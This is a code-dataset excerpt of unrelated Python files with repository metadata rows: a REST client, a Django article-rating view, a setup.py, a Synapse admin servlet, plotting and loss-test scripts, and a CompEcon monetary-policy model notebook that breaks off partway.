    # Explicit argument wins; otherwise fall back to the configuration,
    # then to a default of 4 connections per host.
    if maxsize is None:
        if configuration.connection_pool_maxsize is not None:
            maxsize = configuration.connection_pool_maxsize
        else:
            maxsize = 4

    common_kwargs = dict(
        num_pools=pools_size,
        maxsize=maxsize,
        cert_reqs=cert_reqs,
        ca_certs=configuration.ssl_ca_cert,
        cert_file=configuration.cert_file,
        key_file=configuration.key_file,
        **extra_pool_args
    )

    # Route through the proxy only when one is configured and the target
    # host is not excluded by the no_proxy rules.
    if configuration.proxy and not should_bypass_proxies(
            configuration.host, no_proxy=configuration.no_proxy or ''):
        self.pool_manager = urllib3.ProxyManager(
            proxy_url=configuration.proxy,
            proxy_headers=configuration.proxy_headers,
            **common_kwargs
        )
    else:
        self.pool_manager = urllib3.PoolManager(**common_kwargs)
def request(self, method, url, query_params=None, headers=None,
            body=None, post_params=None, _preload_content=True,
            _request_timeout=None):
    """Perform requests.

    :param method: http request method
    :param url: http request url
    :param query_params: query parameters in the url
    :param headers: http request headers
    :param body: request json body, for `application/json`
    :param post_params: request post parameters,
                        `application/x-www-form-urlencoded`
                        and `multipart/form-data`
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    """
    method = method.upper()
    assert method in ['GET', 'HEAD', 'DELETE', 'POST', 'PUT',
                      'PATCH', 'OPTIONS']

    # body and post_params are mutually exclusive encodings of the payload
    if post_params and body:
        raise ApiValueError(
            "body parameter cannot be used with post_params parameter."
        )

    post_params = post_params or {}
    headers = headers or {}

    # Translate the scalar-or-tuple timeout into a urllib3.Timeout object.
    timeout = None
    if _request_timeout:
        if isinstance(_request_timeout, (int, float)):  # noqa: E501,F821
            timeout = urllib3.Timeout(total=_request_timeout)
        elif (isinstance(_request_timeout, tuple) and
              len(_request_timeout) == 2):
            timeout = urllib3.Timeout(
                connect=_request_timeout[0], read=_request_timeout[1])

    try:
        # For `POST`, `PUT`, `PATCH`, `OPTIONS`, `DELETE`
        if method in ['POST', 'PUT', 'PATCH', 'OPTIONS', 'DELETE']:
            # Only set a default Content-Type for POST, PUT, PATCH and OPTIONS requests
            if (method != 'DELETE') and ('Content-Type' not in headers):
                headers['Content-Type'] = 'application/json'
            if query_params:
                url += '?' + urlencode(query_params)
            # Missing Content-Type defaults to JSON serialization of `body`.
            if ('Content-Type' not in headers) or (re.search('json', headers['Content-Type'], re.IGNORECASE)):
                request_body = None
                if body is not None:
                    request_body = json.dumps(body)
                r = self.pool_manager.request(
                    method, url,
                    body=request_body,
                    preload_content=_preload_content,
                    timeout=timeout,
                    headers=headers)
            elif headers['Content-Type'] == 'application/x-www-form-urlencoded':  # noqa: E501
                r = self.pool_manager.request(
                    method, url,
                    fields=post_params,
                    encode_multipart=False,
                    preload_content=_preload_content,
                    timeout=timeout,
                    headers=headers)
            elif headers['Content-Type'] == 'multipart/form-data':
                # must del headers['Content-Type'], or the correct
                # Content-Type which generated by urllib3 will be
                # overwritten.
                del headers['Content-Type']
                r = self.pool_manager.request(
                    method, url,
                    fields=post_params,
                    encode_multipart=True,
                    preload_content=_preload_content,
                    timeout=timeout,
                    headers=headers)
            # Pass a `string` parameter directly in the body to support
            # other content types than Json when `body` argument is
            # provided in serialized form
            elif isinstance(body, str) or isinstance(body, bytes):
                request_body = body
                r = self.pool_manager.request(
                    method, url,
                    body=request_body,
                    preload_content=_preload_content,
                    timeout=timeout,
                    headers=headers)
            else:
                # Cannot generate the request from given parameters
                msg = """Cannot prepare a request message for provided
                         arguments. Please check that your arguments match
                         declared content type."""
                raise ApiException(status=0, reason=msg)
        # For `GET`, `HEAD`
        else:
            r = self.pool_manager.request(method, url,
                                          fields=query_params,
                                          preload_content=_preload_content,
                                          timeout=timeout,
                                          headers=headers)
    except urllib3.exceptions.SSLError as e:
        msg = "{0}\n{1}".format(type(e).__name__, str(e))
        raise ApiException(status=0, reason=msg)

    if _preload_content:
        r = RESTResponse(r)

        # log response body
        logger.debug("response body: %s", r.data)

    # Map non-2xx statuses onto the client exception hierarchy.
    if not 200 <= r.status <= 299:
        if r.status == 401:
            raise UnauthorizedException(http_resp=r)

        if r.status == 403:
            raise ForbiddenException(http_resp=r)

        if r.status == 404:
            raise NotFoundException(http_resp=r)

        if 500 <= r.status <= 599:
            raise ServiceException(http_resp=r)

        raise ApiException(http_resp=r)

    return r
def GET(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("GET", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def HEAD(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("HEAD", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def OPTIONS(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("OPTIONS", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def DELETE(self, url, headers=None, query_params=None, body=None,
_preload_content=True, _request_timeout=None):
return self.request("DELETE", url,
headers=headers,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def POST(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("POST", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PUT(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PUT", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PATCH(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PATCH", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
# end of class RESTClientObject
def is_ipv4(target):
    """Return True if *target* parses as an IPv4 address.

    Args:
        target: Candidate value, typically a dotted-quad string such as
            ``"192.168.0.1"``.

    Returns:
        bool: True when ``ipaddress.IPv4Address`` accepts the value,
        False when it raises ``AddressValueError``.
    """
    try:
        # The constructor's side effect (validation) is all we need;
        # the previous code bound the result to an unused local.
        ipaddress.IPv4Address(target)
        return True
    except ipaddress.AddressValueError:
        return False
def in_ipv4net(target, net):
    """Return True if IPv4 address *target* belongs to IPv4 network *net*.

    Args:
        target: Address string, e.g. ``"192.168.1.5"``.
        net: Network string in CIDR notation, e.g. ``"192.168.1.0/24"``.

    Returns:
        bool: True when the address lies inside the network; False when
        either value fails to parse (``AddressValueError`` /
        ``NetmaskValueError``).
    """
    try:
        # Keep the original construction order (network first) so any
        # exception raised for an invalid *net* matches prior behaviour.
        network = ipaddress.IPv4Network(net)
        address = ipaddress.IPv4Address(target)
        return address in network
    except (ipaddress.AddressValueError, ipaddress.NetmaskValueError):
        return False
def should_bypass_proxies(url, no_proxy=None):
    """Decide whether proxies should be skipped for *url*.

    A re-implementation of ``requests.should_bypass_proxies``: the URL's
    hostname is matched against the comma-separated *no_proxy* list (IPv4
    entries are matched as networks), falling back to
    ``proxy_bypass_environment`` for everything else.
    """
    hostname = urlparse(url).hostname
    # A URL without a hostname can never be proxied.
    if hostname in (None, ''):
        return True
    # No exclusion list configured: always use the proxy.
    if no_proxy in (None, ''):
        return False
    # A lone wildcard disables proxying entirely.
    if no_proxy == '*':
        return True
    normalized = no_proxy.lower().replace(' ', '')
    candidates = (entry for entry in normalized.split(',') if entry)
    if is_ipv4(hostname):
        for candidate in candidates:
            if in_ipv4net(hostname, candidate):
                return True
    return proxy_bypass_environment(hostname, {'no': normalized})
| 41.210375 | 179 | 0.558252 |
dfdb981453044ee18396947737b47975e82720f7 | 4,905 | py | Python | authors/apps/rating/views.py | andela/ah-alpha | dbc038c9a11362a314c258a80c4a133d11ff1012 | [
"BSD-3-Clause"
] | 1 | 2019-03-18T08:24:37.000Z | 2019-03-18T08:24:37.000Z | authors/apps/rating/views.py | andela/ah-alpha | dbc038c9a11362a314c258a80c4a133d11ff1012 | [
"BSD-3-Clause"
] | 39 | 2019-01-08T12:12:57.000Z | 2022-03-11T23:39:18.000Z | authors/apps/rating/views.py | jamesbeamie/bolt-J | 1824afd73bfba708f0e56fbd7cbb8d7521f06a1a | [
"BSD-3-Clause"
] | 2 | 2019-02-04T08:36:44.000Z | 2019-03-05T19:59:44.000Z | from rest_framework.generics import (
GenericAPIView
)
from .models import Article, Rating
from rest_framework.permissions import (
IsAuthenticatedOrReadOnly,
IsAuthenticated
)
from rest_framework.exceptions import NotFound, ValidationError
from .serializers import RatingSerializer
from rest_framework.response import Response
from .messages import error_msg, success_msg
from django.shortcuts import get_object_or_404
from rest_framework import serializers, status
from django.db.models import Avg
class RatingAPIView(GenericAPIView):
    """Create, fetch and delete a user's rating of an article (looked up by slug)."""
    queryset = Rating.objects.all()
    serializer_class = RatingSerializer
    # Anonymous users get read-only access; POST/DELETE require authentication.
    permission_classes = (IsAuthenticatedOrReadOnly,)
    def get_article(self, slug):
        """
        Return the article with the given slug, or None when it does not exist.
        """
        article = Article.objects.all().filter(slug=slug).first()
        return article
    def get_rating(self, user, article):
        """
        Return the given user's rating of the article.

        Raises NotFound when the user has not rated the article.
        """
        try:
            return Rating.objects.get(user=user, article=article)
        except Rating.DoesNotExist:
            raise NotFound(detail={'rating': error_msg['rating_not_found']})
    def post(self, request, slug):
        """
        Create or update the requesting user's rating for the article.
        """
        rating = request.data
        article = self.get_article(slug)
        # The article must exist before it can be rated.
        if not article:
            raise ValidationError(
                detail={'message': error_msg['not_found']})
        # Authors may not rate their own articles.
        if article.author == request.user:
            raise ValidationError(
                detail={'message': error_msg['own_rating']})
        # Update the rating if one already exists, otherwise create it.
        try:
            # Bind the serializer to the existing rating -> update on save.
            current_rating = Rating.objects.get(
                user=request.user.id,
                article=article.id
            )
            serializer = self.serializer_class(current_rating, data=rating)
        except Rating.DoesNotExist:
            # No prior rating: the serializer will create a fresh one.
            serializer = self.serializer_class(data=rating)
        serializer.is_valid(raise_exception=True)
        serializer.save(user=request.user, article=article)
        return Response({
            'message': success_msg['rate_success'],
            'data': serializer.data
        }, status=status.HTTP_201_CREATED)
    def get(self, request, slug):
        """
        Return rating information for the article.

        Users who rated the article get their own rating back; everyone
        else receives the average rating, the rating count and a
        placeholder message in 'your_rating'.
        """
        article = self.get_article(slug)
        rating = None
        # The article must exist.
        if not article:
            raise ValidationError(
                detail={'message': error_msg['not_found']})
        if request.user.is_authenticated:
            try:
                rating = Rating.objects.get(user=request.user, article=article)
            except Rating.DoesNotExist:
                pass
        if rating is None:
            # No personal rating available: report the aggregate figures.
            avg = Rating.objects.filter(
                article=article).aggregate(Avg('your_rating'))
            average = avg['your_rating__avg']
            count = Rating.objects.filter(
                article=article.id).count()
            # Avg() comes back None when nobody has rated the article yet.
            if avg['your_rating__avg'] is None:
                average = 0
            if request.user.is_authenticated:
                return Response({
                    'article': article.slug,
                    'average_rating': average,
                    'rate_count': count,
                    'your_rating': error_msg['rating_not_found']
                }, status=status.HTTP_200_OK)
            else:
                return Response({
                    'article': article.slug,
                    'average_rating': average,
                    'rate_count': count,
                    'your_rating': error_msg['no_login']
                }, status=status.HTTP_200_OK)
        serializer = self.serializer_class(rating)
        return Response({
            'message': success_msg['retrive_success'],
            'data': serializer.data
        }, status=status.HTTP_200_OK)
    def delete(self, request, slug):
        """
        Delete the requesting user's rating of the article.
        """
        article = self.get_article(slug)
        # NOTE(review): when the user is not authenticated this method falls
        # through and implicitly returns None; DRF's IsAuthenticatedOrReadOnly
        # permission should reject anonymous DELETEs before reaching here —
        # confirm this guard is intentional rather than a missing branch.
        if request.user.is_authenticated:
            # The article must exist.
            if not article:
                raise ValidationError(
                    detail={'message': error_msg['not_found']},)
            elif article.author != request.user:
                # Fetch the caller's rating (raises NotFound if absent) and remove it.
                rating = self.get_rating(user=request.user, article=article)
                rating.delete()
                return Response(
                    {'message': success_msg['delete_success']},
                    status=status.HTTP_200_OK
                )
            else:
                # Authors never have a rating of their own article to delete.
                raise ValidationError(
                    detail={'message': error_msg['no_delete']})
| 32.919463 | 79 | 0.572477 |
999f0bb619cc0ed118f4cf42a176c821186963af | 119 | py | Python | exe025-procurandostringdentrodeoutra.py | carlosbandelli/Exercicios_em_Python | 2cd5bd837fdc51932f9605db32366ad0e3871d87 | [
"MIT"
] | null | null | null | exe025-procurandostringdentrodeoutra.py | carlosbandelli/Exercicios_em_Python | 2cd5bd837fdc51932f9605db32366ad0e3871d87 | [
"MIT"
] | null | null | null | exe025-procurandostringdentrodeoutra.py | carlosbandelli/Exercicios_em_Python | 2cd5bd837fdc51932f9605db32366ad0e3871d87 | [
"MIT"
] | null | null | null | nome = str(input('Qual é seu nome completo? ').strip())
print('Seu nome tem Silva? {}'.format('silva' in nome.lower())) | 59.5 | 63 | 0.663866 |
11aee998c6bbd8d395ed9ebf68ad1c9d97495b5b | 602 | py | Python | setup.py | messente/verigator-python | a1eb020785dc1474b8a74ff351b6f0c47b649e16 | [
"Apache-2.0"
] | null | null | null | setup.py | messente/verigator-python | a1eb020785dc1474b8a74ff351b6f0c47b649e16 | [
"Apache-2.0"
] | null | null | null | setup.py | messente/verigator-python | a1eb020785dc1474b8a74ff351b6f0c47b649e16 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from setuptools import setup
# Package metadata and dependencies for the verigator client library.
setup(
    name="verigator",
    version="1.0.4",
    packages=["messente.verigator"],
    # NOTE(review): requests is a runtime dependency (install_requires);
    # repeating it in setup_requires (build-time deps) is almost certainly
    # unintended — confirm before removing.
    setup_requires=["requests==2.18.4"],
    install_requires=["requests==2.18.4"],
    tests_require=["requests-mock==1.3.0", "mock==2.0.0"],
    author="Verigator.com",
    author_email="admin@verigator.com",
    description="Official Verigator.com API library",
    license="Apache License, Version 2",
    keywords="verigator messente sms verification 2FA pin code",
    url="http://messente.com/documentation/",
    test_suite="messente.verigator.test"
)
| 30.1 | 64 | 0.672757 |
d0c86b204a1c9f65ec53929727f95342d51f33e8 | 1,554 | py | Python | synapse/rest/admin/groups.py | littlebenlittle/synapse | 0eccf531466d762ede0dd365284a8465bfb18d0f | [
"Apache-2.0"
] | 1 | 2021-04-27T19:04:56.000Z | 2021-04-27T19:04:56.000Z | synapse/rest/admin/groups.py | littlebenlittle/synapse | 0eccf531466d762ede0dd365284a8465bfb18d0f | [
"Apache-2.0"
] | null | null | null | synapse/rest/admin/groups.py | littlebenlittle/synapse | 0eccf531466d762ede0dd365284a8465bfb18d0f | [
"Apache-2.0"
] | 1 | 2021-09-27T14:45:52.000Z | 2021-09-27T14:45:52.000Z | # -*- coding: utf-8 -*-
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from synapse.api.errors import SynapseError
from synapse.http.servlet import RestServlet
from synapse.rest.admin._base import admin_patterns, assert_user_is_admin
# Module-level logger named after this module's import path.
logger = logging.getLogger(__name__)
class DeleteGroupAdminRestServlet(RestServlet):
    """Admin endpoint that lets server admins delete groups hosted locally.
    """
    PATTERNS = admin_patterns("/delete_group/(?P<group_id>[^/]*)")
    def __init__(self, hs):
        # Handler owning group logic for groups hosted on this server.
        self.group_server = hs.get_groups_server_handler()
        # Predicate: does this group_id belong to this homeserver?
        self.is_mine_id = hs.is_mine_id
        self.auth = hs.get_auth()
    async def on_POST(self, request, group_id):
        # Caller must be authenticated and must be a server admin.
        requester = await self.auth.get_user_by_req(request)
        await assert_user_is_admin(self.auth, requester.user)
        # Groups hosted on other homeservers cannot be deleted from here.
        if not self.is_mine_id(group_id):
            raise SynapseError(400, "Can only delete local groups")
        await self.group_server.delete_group(group_id, requester.user.to_string())
        return 200, {}
| 35.318182 | 82 | 0.729086 |
27e623bed9452b38cb8bb819cc1fd3cffac10b75 | 727 | py | Python | matplot/subplots.py | rodrigoc-silva/machine-learnig | bcd1be36b1217c20c29a98b7991aefc62faa79f9 | [
"MIT"
] | null | null | null | matplot/subplots.py | rodrigoc-silva/machine-learnig | bcd1be36b1217c20c29a98b7991aefc62faa79f9 | [
"MIT"
] | null | null | null | matplot/subplots.py | rodrigoc-silva/machine-learnig | bcd1be36b1217c20c29a98b7991aefc62faa79f9 | [
"MIT"
] | null | null | null |
import pandas as pd
from matplotlib import pyplot as plt
plt.style.use('seaborn')
# Load the salary survey and pull out the columns we plot.
salary_data = pd.read_csv('data2.csv')
ages = salary_data['Age']
all_dev_salaries = salary_data['All_Devs']
python_salaries = salary_data['Python']
js_salaries = salary_data['JavaScript']
# Two vertically stacked panels sharing the age (x) axis.
fig, (top_ax, bottom_ax) = plt.subplots(nrows=2, ncols=1, sharex=True)
top_ax.plot(ages, all_dev_salaries, color='#444444', linestyle='--', label='All Devs')
bottom_ax.plot(ages, python_salaries, label='Python')
bottom_ax.plot(ages, js_salaries, label='JavaScript')
top_ax.legend()
top_ax.set_title('Median Salary (USD) by Age')
top_ax.set_ylabel('Median Salary (USD)')
bottom_ax.legend()
bottom_ax.set_xlabel('Ages')
bottom_ax.set_ylabel('Median Salary (USD)')
plt.tight_layout()
plt.show() | 22.71875 | 79 | 0.709766 |
44d81d496fe35f74cc9ae63d9c53a87e4fc1ab81 | 1,230 | py | Python | test/test_loss.py | petteriTeikari/crank-voiceconversion-wrapper | 8d34a76a8a4949cb1780a4770922f755dd04000c | [
"MIT"
] | null | null | null | test/test_loss.py | petteriTeikari/crank-voiceconversion-wrapper | 8d34a76a8a4949cb1780a4770922f755dd04000c | [
"MIT"
] | null | null | null | test/test_loss.py | petteriTeikari/crank-voiceconversion-wrapper | 8d34a76a8a4949cb1780a4770922f755dd04000c | [
"MIT"
] | null | null | null | #! /usr/local/bin/python
# -*- coding: utf-8 -*-
#
# test_loss.py
# First ver.: 2020-05-12
#
# Copyright 2020
# K. Kobayashi <root.4mac@gmail.com>
#
# Distributed under terms of the MIT license.
#
"""
"""
import torch
from crank.net.module.loss import (CustomFeatureLoss, MultiSizeSTFTLoss,
STFTLoss)
# Shared random-tensor dimensions for the tests: batch, time length, feature dim.
B, T, D = 3, 1000, 10
def test_stftloss():
    """Smoke-test STFTLoss and MultiSizeSTFTLoss on random signals."""
    fft_size, hop_size, win_size = 32, 10, 20
    estimate = torch.randn((B, T * 100, D))
    reference = torch.randn((B, T * 100, D))
    single_loss = STFTLoss(
        fft_size=fft_size,
        hop_size=hop_size,
        win_size=win_size,
        logratio=0.0,
        device="cpu",
    )
    _ = single_loss(estimate, reference)
    multi_loss = MultiSizeSTFTLoss(device="cpu")
    _ = multi_loss(estimate, reference)
def test_customloss():
    """Smoke-test CustomFeatureLoss over causal sizes and loss types."""
    estimate = torch.randn((B, T, D))
    reference = torch.randn((B, T, D))
    mask = estimate.ge(0)
    for causal_size in [-8, -2, 0, 2, 8]:
        for loss_type in ["l1", "mse", "stft"]:
            criterion = CustomFeatureLoss(
                loss_type=loss_type, causal=True, device="cpu"
            )
            # The STFT variant does not accept mask/causal_size kwargs.
            if loss_type != "stft":
                _ = criterion(estimate, reference, mask=mask, causal_size=causal_size)
            else:
                _ = criterion(estimate, reference)
| 22.363636 | 72 | 0.534146 |
d37b237042474d52fb56a405fab3c2158d129235 | 9,502 | py | Python | _build/jupyter_execute/notebooks/dp/11 Monetary Policy Model.py | randall-romero/CompEcon-python | c7a75f57f8472c972fddcace8ff7b86fee049d29 | [
"MIT"
] | 23 | 2016-12-14T13:21:27.000Z | 2020-08-23T21:04:34.000Z | _build/jupyter_execute/notebooks/dp/11 Monetary Policy Model.py | randall-romero/CompEcon | c7a75f57f8472c972fddcace8ff7b86fee049d29 | [
"MIT"
] | 1 | 2017-09-10T04:48:54.000Z | 2018-03-31T01:36:46.000Z | _build/jupyter_execute/notebooks/dp/11 Monetary Policy Model.py | randall-romero/CompEcon-python | c7a75f57f8472c972fddcace8ff7b86fee049d29 | [
"MIT"
] | 13 | 2017-02-25T08:10:38.000Z | 2020-05-15T09:49:16.000Z | #!/usr/bin/env python
# coding: utf-8
# # Monetary Policy Model
#
# **Randall Romero Aguilar, PhD**
#
# This demo is based on the original Matlab demo accompanying the <a href="https://mitpress.mit.edu/books/applied-computational-economics-and-finance">Computational Economics and Finance</a> 2001 textbook by Mario Miranda and Paul Fackler.
#
# Original (Matlab) CompEcon file: **demdp11.m**
#
# Running this file requires the Python version of CompEcon. This can be installed with pip by running
#
# !pip install compecon --upgrade
#
# <i>Last updated: 2021-Oct-01</i>
# <hr>
# ## About
#
# A central bank must set nominal interest rate so as to minimize deviations of inflation rate and GDP gap from established targets.
#
# A monetary authority wishes to control the nominal interest rate $x$ in order to minimize the variation of the inflation rate $s_1$ and the gross domestic product (GDP) gap $s_2$ around specified targets $s^∗_1$ and $s^∗_2$, respectively. Specifically, the authority wishes to minimize expected discounted stream of weighted squared deviations
#
# \begin{equation}
# L(s) = \frac{1}{2}(s − s^∗)'\Omega(s − s^∗)
# \end{equation}
#
# where $s$ is a $2\times 1$ vector containing the inflation rate and the GDP gap, $s^∗$ is a $2\times 1$ vector of targets, and $\Omega$ is a $2 \times 2$ constant positive definite matrix of preference weights. The inflation rate and the GDP gap are a joint controlled exogenous linear Markov process
#
# \begin{equation}
# s_{t+1} = \alpha + \beta s_t + \gamma x_t + \epsilon_{t+1}
# \end{equation}
#
# where $\alpha$ and $\gamma$ are $2 \times 1$ constant vectors, $\beta$ is a $2 \times 2$ constant matrix, and $\epsilon$ is a $2 \times 1$ random vector with mean zero. For institutional reasons, the nominal interest rate $x$ cannot be negative. **What monetary policy minimizes the sum of current and expected future losses?**
#
# This is an infinite horizon, stochastic model with time $t$ measured in years. The state vector $s \in \mathbb{R}^2$
# contains the inflation rate and the GDP gap. The action variable $x \in [0,\infty)$ is the nominal interest rate. The state transition function is $g(s, x, \epsilon) = \alpha + \beta s + \gamma x + \epsilon$
#
# In order to formulate this problem as a maximization problem, one posits a reward function that equals the negative of the loss function $f(s,x) = −L(s)$
#
# The sum of current and expected future rewards satisfies the Bellman equation
#
# \begin{equation}
# V(s) = \max_{0\leq x}\left\{-L(s) + \delta + E_\epsilon V\left(g(s,x,\epsilon)\right)\right\}
# \end{equation}
#
#
# Given the structure of the model, one cannot preclude the possibility that the nonnegativity constraint on the optimal nominal interest rate will be binding in certain states. Accordingly, the shadow-price function $\lambda(s)$ is characterized by the Euler conditions
#
# \begin{align}
# \delta\gamma'E_\epsilon \lambda\left(g(s,x,\epsilon)\right) &= \mu \\
# \lambda(s) &= -\Omega(s-s^*) + \delta\beta'E_\epsilon \lambda\left(g(s,x,\epsilon)\right)
# \end{align}
#
# where the nominal interest rate $x$ and the long-run marginal reward $\mu$ from increasing the nominal interest rate must satisfy the complementarity condition
# \begin{equation}
# x \geq 0, \qquad \mu \leq 0, \qquad x > 0 \Rightarrow \mu = 0
# \end{equation}
#
# It follows that along the optimal path
#
# \begin{align}
# \delta\gamma'E_\epsilon \lambda_{t+1} &= \mu_t \\
# \lambda_t &= -\Omega(s_t-s^*) + \delta\beta'E_\epsilon \lambda_{t+1}\\
# x \geq 0, \qquad \mu \leq 0, &\qquad x > 0 \Rightarrow \mu = 0
# \end{align}
#
# Thus, in any period, the nominal interest rate is reduced until either the long-run marginal reward or the nominal interest rate is driven to zero.
# In[1]:
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
from compecon import BasisChebyshev, DPmodel, BasisSpline, qnwnorm, demo
import pandas as pd
pd.set_option('display.float_format',lambda x: f'{x:.3f}')
# ### Model Parameters
#
# In[2]:
# Transition law: s' = α + β·s + γ·x + ε, with loss weights Ω around targets ξ.
α = np.array([[0.9, -0.1]]).T # transition function constant coefficients
β = np.array([[-0.5, 0.2], [0.3, -0.4]]) # transition function state coefficients
γ = np.array([[-0.1, 0.0]]).T # transition function action coefficients
Ω = np.identity(2) # central banker's preference weights
ξ = np.array([[1, 0]]).T # equilibrium targets
μ = np.zeros(2) # shock mean
σ = 0.08 * np.identity(2), # shock covariance matrix
# NOTE(review): the trailing comma above makes σ a 1-tuple wrapping the matrix
# rather than the matrix itself — confirm qnwnorm tolerates/expects this.
δ = 0.9 # discount factor
# ### State Space
# There are two state variables: 'GDP gap' = $s_0\in[-2,2]$ and 'inflation'=$s_1\in[-3,3]$.
# In[3]:
n = 21
smin = [-2, -3]
smax = [ 2, 3]
# Chebyshev interpolation basis over the 2-D state space (n nodes per dimension).
basis = BasisChebyshev(n, smin, smax, method='complete',
                       labels=['GDP gap', 'inflation'])
# ### Action space
#
# There is only one action variable x: the nominal interest rate, which must be nonnegative.
# In[4]:
def bounds(s, i, j):
    """Action bounds at each state node: the nominal interest rate lies in [0, ∞)."""
    lower = np.zeros_like(s[0])
    upper = np.full(lower.shape, np.inf)
    return lower, upper
# ### Reward Function
# In[5]:
def reward(s, x, i, j):
    """Negative quadratic loss -(1/2)(s-ξ)'Ω(s-ξ) and its (zero) x-derivatives.

    Returns the tuple (f, fx, fxx) expected by DPmodel; the reward does not
    depend on the action, so both derivative arrays are zero.
    """
    deviation = s - ξ
    value = np.zeros_like(deviation[0])
    for row in range(2):
        for col in range(2):
            value -= 0.5 * Ω[row, col] * deviation[row] * deviation[col]
    fx = np.zeros_like(x)
    fxx = np.zeros_like(x)
    return value, fx, fxx
# ### State Transition Function
# In[6]:
def transition(s, x, i, j, in_, e):
    """Linear state transition g = α + β·s + γ·x + ε and its x-derivatives."""
    next_state = α + β @ s + γ @ x + e
    # ∂g/∂x is the constant vector γ, replicated across the nodes in x.
    jac_x = np.tile(γ, (1, x.size))
    hess_x = np.zeros_like(s)
    return next_state, jac_x, hess_x
# The continuous shock must be discretized. Here we use Gauss-Legendre quadrature to obtain nodes and weights defining a discrete distribution that matches the first 6 moments of the Normal distribution (this is achieved with m=3 nodes and weights) for each of the state variables.
# In[7]:
# Discretize the Gaussian shock with m quadrature nodes per state dimension.
m = [3, 3]
[e,w] = qnwnorm(m,μ,σ)
# ### Model structure
# In[8]:
bank = DPmodel(basis, reward, transition, bounds,
               x=['interest'], discount=δ, e=e, w=w)
# Compute Unconstrained Deterministic Steady-State
# In[9]:
bank_lq = bank.lqapprox(ξ,0)
sstar = bank_lq.steady['s']
xstar = bank_lq.steady['x']
# If Nonnegativity Constraint Violated, Re-Compute Deterministic Steady-State
# In[10]:
if xstar < 0:
    # NOTE(review): `I` is assigned but never used below.
    I = np.identity(2)
    xstar = 0.0
    # With x pinned at 0, the steady state solves s = α + β·s.
    sstar = np.linalg.solve(np.identity(2) - β, α)
    frmt = '\t%-21s = %5.2f'
    print('Deterministic Steady-State')
    print(frmt % ('GDP Gap', sstar[0]))
    print(frmt % ('Inflation Rate', sstar[1]))
    print(frmt % ('Nominal Interest Rate', xstar))
# ### Solve the model
# We solve the model by calling the `solve` method in `bank`. On return, `sol` is a pandas dataframe with columns *GDP gap*, *inflation*, *value*, *interest*, and *resid*. We set a refined grid `nr=5` for this output.
# In[11]:
S = bank.solve(nr=5)
# To make the 3D plots, we need to reshape the columns of `sol`.
# In[12]:
S3d = {x: S[x].values.reshape((5*n,5*n)) for x in S.columns}
# This function will make all plots
# In[13]:
def makeplot(series,zlabel,zticks,title):
    """Draw a 3D surface of one solution column over the refined state grid.

    Args:
        series: Column name looked up in the module-level ``S3d`` dict of
            reshaped solution arrays.
        zlabel: Label for the vertical (z) axis.
        zticks: Tick locations for the z axis.
        title: Figure title.

    Returns:
        The created matplotlib Figure.  Previously the function returned
        None, so assignments such as ``fig1 = makeplot(...)`` (and the
        commented-out ``demo.savefig`` call) captured nothing; returning
        the figure also matches the sibling ``simplot``.
    """
    fig = plt.figure(figsize=[8,5])
    # Figure.gca(projection=...) was deprecated in matplotlib 3.4 and removed
    # in 3.6; add_subplot is the supported way to create 3D axes.
    ax = fig.add_subplot(projection='3d')
    ax.plot_surface(S3d['GDP gap'], S3d['inflation'], S3d[series], cmap=cm.coolwarm)
    ax.set_xlabel('GDP gap')
    ax.set_ylabel('Inflation')
    ax.set_zlabel(zlabel)
    ax.set_xticks(np.arange(-2,3))
    ax.set_yticks(np.arange(-3,4))
    ax.set_zticks(zticks)
    ax.set_title(title)
    return fig
# ### Optimal policy
# In[14]:
fig1 = makeplot('interest', 'Nomianal Interest Rate',
                np.arange(0,21,5),'Optimal Monetary Policy')
# NOTE(review): "Nomianal" above is a typo for "Nominal" in the z-axis label.
# ### Value function
# In[15]:
fig2 = makeplot('value','Value',
                np.arange(-12,S['value'].max(),4),'Value Function')
# ### Residuals
# In[16]:
fig3 = makeplot('resid','Residual',
                [-1.5e-3, 0, 1.5e3],'Bellman Equation Residual')
# NOTE(review): the tick list mixes -1.5e-3 and 1.5e3 — the upper tick is
# probably meant to be 1.5e-3.
plt.ticklabel_format(style='sci', axis='z', scilimits=(-1,1))
# ## Simulating the model
#
# We simulate 21 periods of the model starting from $s=s_{\min}$, 10000 repetitions.
# In[17]:
T = 21
nrep = 10_000
# NOTE(review): the comment above says "starting from s=s_min" but the code
# tiles smax — confirm which starting point is intended.
data = bank.simulate(T, np.tile(np.atleast_2d(smax).T,nrep))
# In[18]:
# Terminal-period cross-section: ergodic moments vs. deterministic steady state.
